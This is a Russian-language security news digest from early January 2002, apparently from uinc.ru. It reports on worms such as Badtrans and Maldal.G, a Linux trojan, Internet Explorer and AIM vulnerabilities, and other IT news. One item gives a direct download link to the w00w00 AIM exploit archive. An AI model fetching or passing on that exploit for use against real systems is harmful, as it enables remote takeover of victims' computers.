5/01/2002 Поступила в продажу база данных с информацией о компьютерах, зараженных вирусом Badtrans.
Эпидемия интернет-червя Badtrans, который способен красть с пораженного компьютера персональные данные пользователя (логины, пароли и т.д.), а также информацию, вводимую с клавиатуры, наделала много шума в прошлом году. Всю полученную информацию Badtrans отсылал на несколько почтовых адресов, один из которых был расположен на серверах небольшого провайдера Monkeybrains.net. Сотрудник этой компании Руди Рукер (Rudy Rucker) догадался перехватывать эту информацию, и в результате в его распоряжении оказалась огромная база данных, содержащая данные о 300 тысячах пострадавших. Рукер также предоставил пользователям Сети возможность поиска по базе данных, что позволяет узнать, была ли похищена та или иная информация. При этом из соображений безопасности база данных не выдает конфиденциальных сведений, похищенных Badtrans (пароли и т.д.) Подробности: http://www.compulenta.ru/news/2002/1/5/23906/
4/01/2002 В Сети обнаружен новый вирус, поражающий Linux-системы.
Эксперты сообщают о появлении нового вируса, целью которого является операционная система Linux. Новый вирус является модификацией появившегося в октябре вируса для Linux Remote Shell Trojan. Вирус RST.b был обнаружен компанией SecurityFocus в конце декабря. Специалисты сообщают, что для проникновения в систему вирус, скорее всего, использует одну из известных уязвимостей, скорее всего в SSH. После проникновения в систему, троян производит попытку получения полного контроля над системой, с правами root. Вирус также обеспечивает возможность неавторизованного проникновения в систему извне. Подробности - http://www.compulenta.ru/news/2002/1/4/23865/
4/01/2002 В популярных файлообменных программах обнаружен "троян".
Антивирусная компания Symantec сообщила об обнаружении троянской программы, встроенной в популярные файлообменные системы Glokster и Limewire. Троян не наносит очевидного вреда зараженному компьютеру, зато он незаметно для пользователя пересылает его персональную информацию на другой адрес в Интернете. Рекламный софт под названием Clicktilluwin, поставляемый с файлообменными пакетами, содержит программу именуемую W32.DIDer, которую Symantecопределяет как трояна. Хотя рекламный софт (так называемый adware), давно уже поставляется с бесплатными файлообменными программами, зашитый в него вирус обнаружен в первый раз. Троян устанавливается на компьютер, даже если пользователь блокирует установку Clicktilluwin. Поэтому антивирусные компании рекомендуют проверить свои компьютеры, чтобы убедиться в отсутствии этих вирусов. Пользователи жаловались на подобные проблемы с другой файлообменной системой - FastTrack Kazaa Media Desktop. Сотрудники CNET протестировали и этот софт, однако присутствия вируса там обнаружено не было. К сожалению, поскольку упомянутые файлообменные системы пользуются изрядной популярностью, обнаруженный в них троянский конь теоретически мог заразить множество компьютеров. Подробности - http://www.compulenta.ru/news/2002/1/3/23815/
4/01/2002 Microsoft рассылает спам, заботясь о безопасности пользователей.
Microsoft призывает пользователей служб .Net Passport, Hotmail и MSN установить патч для Internet Explorer, выпущенный около двух месяцев назад и решающий серьезную проблему с безопасностью личных данных пользователя в сети. В течение месяца компанией было отправлено несколько десятков миллионов сообщений, призывающих пользователей посетить раздел сайта Microsoft, в котором можно скачать патч для IE, решающий не только проблему с обработкой куков, но и многие другие уязвимости, обнаруженные в браузере за последнее время. Проблема с обработкой куков затрагивает Internet Explorer версий 5.5 и 6. Используя данную уязвимость, злоумышленник может получить удаленный доступ к данным, содержащимся в куках (cookies). Куки используются сайтами для хранения информации о посетителях, в частности, их паролей и номеров кредитных карт. Предполагается, что каждый сайт имеет доступ только к той информации, которую сохранил. Однако, как выяснилось, на практике система безопасности браузера обеспечивает доступ к любым кукам, имеющимся в системе. Проверить свой броузер можно здесь - http://securitycheck.passport.com/default.asp
4/01/2002 AOL вынужден был залатать очередную дыру в своём Instant Messenger.
Пока специалисты AOL отдыхали на рождественских каникулах, международная группа хакеров w00w00, основанная Мэттом Коновером, 19-летним студентом из Юты, создала программу, которая превращает интернет-пейджер AOL Instant Messenger буквально в ключ ко множеству домашних компьютеров (естественно, тех, на которых установлен AIM). Программа использует обнаруженную Коновером серьезную уязвимость, благодаря которой хакер может поставить компьютер своей жертвы под свой полный контроль. Сейчас уязвимость, как утверждают в AOL, уже устранена и пользователям не придется ничего предпринимать, чтобы обезопасить себя от возможных атак. Характерно, что уязвимость обнаружена только в Windows-версии AIM, на других платформах этой проблемы нет. Что касается выпущенной w00w00 программы, то она только закрывала Instant Messenger, и больше никакого вреда не причиняла, однако ее можно модифицировать так, что она начнет представлять серьезную опасность для систем, на которых установлен AIM, а пользователей этого интернет-пейджера в Интернете насчитывается около 100 миллионов. ОДнако, как утверждают подписчика листа рассылки BUGTRAQ, патч, выпущенный AOL, закрывает брешь, препятствующую передаче уязвимого кода через сеть AOL, оставляя, однако сам AIM на компьютере жертвы потенциально уязвимым. Эксплоит w00aimexp - http://www.w00w00.org/files/w00aimexp.tgz Предлагаемый w00w00 фильтр AIMFilter - http://www.ssnbc.com/wiz/ Ссылка на новость - http://www.msnbc.com/modules/exports/ct_email.asp?/news/680950.asp
4/01/2002 Из-за проблем в Windows XP некоторые пользователи AOL не могут получить скоростной доступ в Интернет.
Представители AOL утверждают, что некоторые их клиенты, пользующиеся услугами кабельной сети Time Warner Service (AOL и Time Warner Service являются подразделениями медиагиганта AOL Time Warner), после установки на свои компьютеры операционной системы Windows XP оказались лишены возможности получать услуги по скоростному кабельному соединению с интернетом. Представители AOL говорят, что сейчас ведутся переговоры с Microsoft, и что неполадку устранят через две недели. Пока же AOL несколько изменил конфигурацию своих систем, чтобы пострадавшие пользователи, все-таки, могли получить доступ в Сеть. Пресс-секретарь AOL Эндрю Вайнстайн не уточнил, впрочем, где именно обнаружена неполадка: в Windows XP, системах AOL или у Time Warner Service, а представители Microsoft от комментариев уклонились. Подробности - http://www.msnbc.com/news/681798.asp
4/01/2002 В ФБР остались довольны очередным патчем для Windows XP.
Исследования специалистов Центра по защите национальной инфраструктуры, являющегося одним из подразделений ФБР, показали, что новый патч для Windows XP сможет полностью устранить брешь в системе безопасности Windows XP. В конце декабря представители ФБР заявили, что в системе безопасности Windows XP имеется целый ряд “дыр”, позволяющих хакерам, оставаясь абсолютноно незамеченными, проникать в компьютер и полностью брать его под свой контроль. В данном случае, “беззащитными” оказались 1900 и 5000 UDP порты, обеспечивающие нормальное функционирование в системе устройств Plug’'n'Play. Подробности - http://www.newsbytes.com
3/01/2002 Обнаружена очередная уязвимость в Internet Explorer.
1 января 2002 г. Георгий Гунинский (известный нахождением различных уязвимостей в Интернет-броузерах) обнаружил очень опасную уязвимость в броузере Internet Explorer. Использование Java Script функции GetObject() позволяет, при правильном сформированном запросе, прочитать локальные файлы и выполнить критичные программы на компьютере жертвы. Уязвимости подвержены - патченные IE 6.0 и 5.5 для Win2K. Автор, как всегда, советует отключить Active Scripting и не включать его, а также не использовать IE при просмотре WWW-страниц в Интернете. Подробности уязвимости - http://www.guninski.com/getob3.html
3/01/2002 Новый червь распространяет по Интернету антисемитские лозунги.
Техническая лаборатория компании Panda Software сообщает об обнаружении новой модификации вируса Maldal - W32/Maldal.G. Теоретически этот вирус мог быть крайне опасен и деструктивен, однако Panda Software оценивает и уровень угрозы, и распространения на двойку, а потенциальных повреждений на тройку - по пятибалльной шкале. W32/Maldal.G - червь, использующий для распространения электронную почту. Среди действий, совершаемых этим червем, специалисты особо подчеркивают тот факт, что уничтожает определенные директории и файлы, имеющие расширения .htm, .pps, .php, .html, .com, .bat, .mdb, .xls, .doc, .lnk, .ppt, .jpg, .mpeg, .ini, .dat, .zip и даже .txt. В качестве жертв Maldal избирает каталоги, в которых, судя по названию, могут содержаться известные антивирусные программы. Кроме того, вирус меняет имя компьютера и прописывает себя в реестре Windows таким образом, чтобы автоматически запускаться при каждом включении компьютера. W32/Maldal.G ищет электронные адреса для рассылки зараженных писем в содержимом кэша веб-страниц и в адресных книгах зараженных систем. Запустившись, W32/Maldal.G копирует себя в MS директорию по именем Zacker.exe. Также он создает файл под именем Default.exe во временной папке Windows. Более подробно о вирусе - http://www.compulenta.ru/news/2002/1/3/23811/
3/01/2002 США ослабляют ограничения на ввоз суперкомпьютеров в Россию и другие страны мира.
Как сообщила в среду пресс-служба Белого Дома, президент США Джордж Буш ослабил ограничения на экспорт сверхмощных компьютеров из США в Россию, а также еще в целый ряд стран мира, в том числе, в Израиль, Индию, Пакистан, Китай и Латвию. Как сообщает РИА "Новости", согласно решению Буша, порог мощности суперкомпьютеров, для экспорта которых в страны так называемого "третьего уровня" необходимы специальные индивидуальные лицензии, повышен до 190 млрд. операций в секунду. Прежде этот порог проходил на уровне 85 млрд. операций в секунду. В отношении Латвии особые ограничения по экспорту компьютеров вообще отменены, и она перенесена в список стран "первого уровня", в котором находятся государства Западной Европы, Япония, Канада и Австралия. Для поставок суперкомпьютеров в эти страны специального разрешения не нужно. Подробности - http://www.rian.ru
3/01/2002 Linux-2.2.21pre2.
Вышел очередной пре-релиз стабильной (реально стабильной) ветки ядра 2.2 (на данный момент последняя версия ядра 2.2-2.2.20). Много разных багфиксов и немного бэкпорта из 2.4. В частности, исправления в ISDN, бэкпорт "много x86 setup", VIA chipset фиксы, драйвера. Подробности - http://www.lib.uaa.alaska.edu/linux-kernel/archive/2002-Week-00/0199.html
2/01/2002 Дмитрий Скляров вернулся в Москву.
Дмитрий Скляров, программист компании "Элкомсофт", вернулся в Москву из США, где он находился с середины июля, обвиняемый американскими властями в нарушении Закона об авторских правах в цифровую эпоху (DMCA). В аэропорту Склярова встретила немногочисленная группа родственников, друзей и журналистов. Подробности: http://www.compulenta.ru/news/2002/1/2/23807/
1/01/2002 Новое в разделе новостей: Теперь можно скачать все новости за 2001ый год в одном файле. Скачать в ZIP архиве: http://www.uinc.ru/scripts/load.cgi?news/archive/news_2001.zip Скачать в TGZ архиве: http://www.uinc.ru/scripts/load.cgi?news/archive/news_2001.tgz
31/12/2001 СЕРВЕР WWW.UINC.RU КАТЕГОРИЧЕСКИ ПОЗДРАВЛЯЕТ ВСЕХ ПОCЕТИТЕЛЕЙ НАШЕГО СЕРВЕРА С НАСТУПАЮЩИМ НОВЫМ ГОДОМ! УДАЧИ И СЧАСТЬЯ!
|